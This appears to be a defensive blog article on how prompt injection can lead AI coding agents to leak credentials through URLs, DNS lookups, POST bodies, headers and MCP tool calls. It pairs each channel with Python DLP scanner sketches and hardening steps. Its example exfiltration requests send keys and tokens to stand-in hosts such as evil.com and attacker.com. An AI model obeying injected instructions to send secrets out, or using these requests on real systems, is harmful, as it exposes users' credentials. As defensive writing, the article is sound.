AI coding agents like Claude Code, Cursor, and Windsurf read your environment variables, config files, and source code. They also make HTTP requests to install packages, call APIs, and fetch documentation. That means they have both your secrets and a network connection.

A prompt injection hidden in a dependency, a tool response, or even a markdown file can tell the agent to include your credentials in its next outbound request. The agent doesn't know anything is wrong because the instruction looks like a normal task.

This creates four distinct exfiltration channels. Each one works differently and requires a different defense.

Channel 1: URLs

The simplest attack. The injection tells the agent to request a URL with the secret embedded:

GET https://evil.com/collect?key=AKIAIOSFODNN7EXAMPLE

The secret is in the query string or path. Any proxy or network monitor that inspects URLs can catch this with pattern matching. Regex for known secret formats (AWS keys, GitHub tokens, API keys) flags the request before it leaves the network.

Defense: URL-level DLP scanning on a forward proxy. This is the most widely implemented layer. Most agent security tools cover it.

Gap: Only catches secrets that appear in the URL itself. Attackers who know URL scanning exists will use one of the other three channels.
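The URL check above is the easiest layer to build. A minimal sketch of what a URL-level scanner does, using a few illustrative regexes (real tools ship much larger pattern sets, and the Anthropic key pattern here is an approximation):

```python
import re
from urllib.parse import urlparse

# Hypothetical pattern set for common secret formats.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),           # AWS access key ID
    re.compile(r"ghp_[A-Za-z0-9]{36}"),        # GitHub personal access token
    re.compile(r"sk-ant-[A-Za-z0-9\-]{10,}"),  # Anthropic API key (approximate)
]

def url_contains_secret(url: str) -> bool:
    """Return True if a known secret pattern appears in the URL's path or query."""
    parsed = urlparse(url)
    haystack = parsed.path + "?" + parsed.query
    return any(p.search(haystack) for p in SECRET_PATTERNS)
```

A proxy would run this check on every outbound request and block on a match; the example URL from above would be caught because `AKIAIOSFODNN7EXAMPLE` matches the AWS pattern.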

Channel 2: DNS Queries

This one is subtle. The injection tells the agent to request https://sk-ant-XXXXX.attacker.com/ping. Before the HTTP request even starts, the agent's HTTP client resolves the hostname. That DNS query hits the attacker's nameserver:

sk-ant-api03-abc123def456.attacker.com. IN A

The attacker sees the full subdomain in their query log. The secret is exfiltrated via DNS, not HTTP. No request body, no query parameter, no HTTP traffic at all. Just a DNS lookup.

Defense: DLP scanning must run before DNS resolution. If the proxy resolves the hostname first (which most do), the secret is already gone. The scan ordering matters: pattern match first, then resolve.

Gap: Most proxy tools resolve DNS before applying security rules. This channel is invisible to anything that scans URLs after the connection is established. DNS-over-HTTPS makes it even harder to intercept.
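The ordering requirement can be made concrete. A sketch of a resolver guard that pattern-matches the hostname before any lookup happens (patterns are illustrative, as above):

```python
import re
import socket

SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"sk-ant-[A-Za-z0-9\-]{10,}"),  # approximate Anthropic key shape
]

def resolve_if_clean(hostname: str):
    """Pattern-match the hostname BEFORE resolving it. If a secret appears
    in any label, refuse to look it up at all -- the DNS query itself is
    the leak, so blocking after resolution is too late."""
    if any(p.search(hostname) for p in SECRET_PATTERNS):
        raise PermissionError(f"blocked: secret pattern in hostname {hostname!r}")
    return socket.getaddrinfo(hostname, 443)
```

The hostname from the example above never reaches a nameserver: the `sk-ant-` prefix trips the pattern check first.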

Channel 3: POST Bodies

The agent calls an API with your credentials embedded in the JSON body:

POST https://api.legitimate-service.com/v1/notes
Content-Type: application/json

{"title": "config", "body": "AKIAIOSFODNN7EXAMPLE"}

The URL is clean. The hostname might even be on an allowlist. Every URL-level scanner sees a legitimate API call and lets it through. The secret is in the request body, which URL scanning never touches.

This also works with form-encoded data, multipart file uploads (the secret can be in the filename), and any other content type. Agents make POST requests constantly, so this is indistinguishable from normal behavior.

Defense: Request body DLP scanning. The proxy buffers the body, extracts text strings from JSON, form fields, and multipart parts, then runs the same secret patterns against the extracted text. Fail closed on parse errors (if you can't read it, block it).

Gap: HTTPS traffic through forward proxies uses CONNECT tunnels, which are encrypted. The proxy sees the hostname but not the body. Full body scanning requires either TLS interception (MITM with a trusted CA cert) or routing requests through a fetch endpoint that makes the request on the agent's behalf.
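For the JSON case, the extract-then-scan step looks roughly like this. A sketch assuming the proxy has already buffered a plaintext body (patterns illustrative), with the fail-closed behavior from above:

```python
import json
import re

SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"ghp_[A-Za-z0-9]{36}"),
]

def extract_strings(node):
    """Yield every string from a parsed JSON document: values, keys, list items."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from extract_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from extract_strings(item)

def body_allowed(raw: bytes) -> bool:
    """Fail closed: block unparseable bodies, and block any body containing
    a string that matches a secret pattern."""
    try:
        doc = json.loads(raw)
    except ValueError:  # includes JSONDecodeError and bad UTF-8
        return False
    return not any(p.search(s) for s in extract_strings(doc) for p in SECRET_PATTERNS)
```

The example request above is blocked because the AWS key in the `"body"` field matches, even though its URL and hostname look clean.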

Channel 4: HTTP Headers

The agent sets a custom header with your credential:

GET https://api.example.com/data
Authorization: Bearer sk-ant-api03-abc123def456
X-Debug-Token: ghp_ABCDEFghijklmnopQRSTUVWXyz0123456789

This is the sneakiest channel because agents set authorization headers on every API call. A legitimate Authorization: Bearer <token> header to api.openai.com is correct usage. The same header to evil.com is exfiltration. And an agent sending your OpenAI key to some third service is a gray area that pure pattern matching can't resolve on its own.

Defense: Header DLP scanning. Scan at minimum the known credential-carrying headers (Authorization, Cookie, X-Api-Key). More aggressive mode: scan all headers including header names (secrets can be encoded as custom header names like X-AKIA1234).

Gap: Same CONNECT tunnel limitation as body scanning. Also, legitimate API calls send real credentials in headers. Allowlisting specific keys for specific destinations helps, but it's configuration-heavy and doesn't scale automatically.
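The two modes described above (known credential headers only vs. all headers, names included) can be sketched like this, again with illustrative patterns and assuming the proxy sees plaintext headers:

```python
import re

SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"ghp_[A-Za-z0-9]{36}"),
]

# Headers that routinely carry credentials; scanned in both modes.
CREDENTIAL_HEADERS = {"authorization", "cookie", "x-api-key"}

def scan_headers(headers: dict, aggressive: bool = False) -> list:
    """Return the names of headers that match a secret pattern.
    Default mode scans only known credential-carrying headers;
    aggressive mode scans every header value AND every header name
    (a secret can be smuggled as a custom header name)."""
    flagged = []
    for name, value in headers.items():
        scan_this_value = aggressive or name.lower() in CREDENTIAL_HEADERS
        if scan_this_value and any(p.search(value) for p in SECRET_PATTERNS):
            flagged.append(name)
        elif aggressive and any(p.search(name) for p in SECRET_PATTERNS):
            flagged.append(name)
    return flagged
```

Note the trade-off: default mode misses the X-Debug-Token example above entirely, while aggressive mode catches it but will also flag every legitimate Authorization header carrying a real key.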

What's Actually Available

The security tooling for AI agents is young. Here's what exists today for each channel:

Channel      Defense                        Tooling status
URL          URL-level DLP on proxy         Covered by most agent security tools
DNS          Pre-resolution DLP scanning    Rare; requires scan-ordering awareness
POST body    Request body DLP               Emerging; limited by CONNECT tunnels
Headers      Header DLP scanning            Emerging; legitimate-use false positives

The common pattern across all four: a forward proxy sits between the agent and the internet, scanning outbound traffic for known secret patterns. The difference is what it scans (URL only vs. URL + DNS + body + headers) and when it scans (before or after DNS resolution).

Open source options include Pipelock (scans all four channels, though body and header scanning is limited to plaintext proxy traffic until TLS interception lands). Commercial offerings from Protect AI, Lasso Security, and others are entering the space. The OWASP Top 10 for LLM Applications maps these attacks under "Sensitive Information Disclosure" and has a useful framework for thinking about the risk.

There's also a channel outside HTTP worth mentioning: MCP (Model Context Protocol) tool calls. When agents use MCP servers, the tool arguments are a separate data path. An agent can pass your credentials as a tool argument, and the MCP server forwards them wherever it wants. Scanning MCP tool inputs for secrets requires wrapping the MCP server with an inspection layer, which is architecturally different from HTTP proxy scanning but solves the same problem.
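What an MCP inspection layer does is conceptually the same scan applied to tool arguments instead of HTTP traffic. A hypothetical shim, sketched with an illustrative pattern (the function name and shape are assumptions, not any real MCP SDK API):

```python
import re

SECRET_PATTERNS = [re.compile(r"AKIA[0-9A-Z]{16}")]

def inspect_tool_call(tool_name: str, arguments: dict) -> dict:
    """Hypothetical pre-forwarding check: walk every string in the tool
    arguments and block the call if any matches a secret pattern."""
    def walk(node):
        if isinstance(node, str):
            if any(p.search(node) for p in SECRET_PATTERNS):
                raise PermissionError(f"secret in arguments to tool {tool_name!r}")
        elif isinstance(node, dict):
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)
    walk(arguments)
    return arguments  # clean; safe to forward to the real MCP server
```

The wrapper sits between the agent and the MCP server, so the check runs before the server ever sees the arguments.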

What's Still Unsolved

Even with all four HTTP channels covered, some exfiltration techniques remain hard to stop.

The fundamental tension: AI agents need network access and credential access to do their jobs. Removing either one makes them useless. The security challenge is monitoring the intersection without breaking the workflow.

What You Can Do Now

If you're running AI coding agents with access to production credentials:

  1. Route agent traffic through a proxy. Even basic URL scanning is better than nothing. Set HTTPS_PROXY and HTTP_PROXY in the agent's environment.
  2. Audit what your agent can see. Check which environment variables, config files, and secrets are accessible. Remove what the agent doesn't need.
  3. Allowlist outbound domains. If your agent only needs api.anthropic.com, registry.npmjs.org, and github.com, don't let it talk to anything else.
  4. Watch for the less obvious channels. URL scanning alone is not enough. DNS, bodies, and headers are where the next generation of attacks will land.
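Step 1 above amounts to a few environment variables. A sketch of the setup, assuming a forward proxy is listening locally at 127.0.0.1:8080 (that address is an assumption; use your proxy's actual address):

```python
import os

# Point the agent's standard proxy variables at a local forward proxy
# so all of its HTTP(S) traffic passes through the scanning layer.
env = dict(os.environ)
env["HTTP_PROXY"] = "http://127.0.0.1:8080"   # assumed local proxy address
env["HTTPS_PROXY"] = "http://127.0.0.1:8080"
env["NO_PROXY"] = "localhost,127.0.0.1"       # keep loopback traffic direct

# The agent is then launched with this environment, e.g. via subprocess.
```

Most HTTP clients honor these variables, but not all; verify with the proxy's access log that the agent's traffic actually flows through it.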

The agent security space is moving fast. The attacks are well-documented, the defenses are catching up, and the gap between the two is where real damage happens.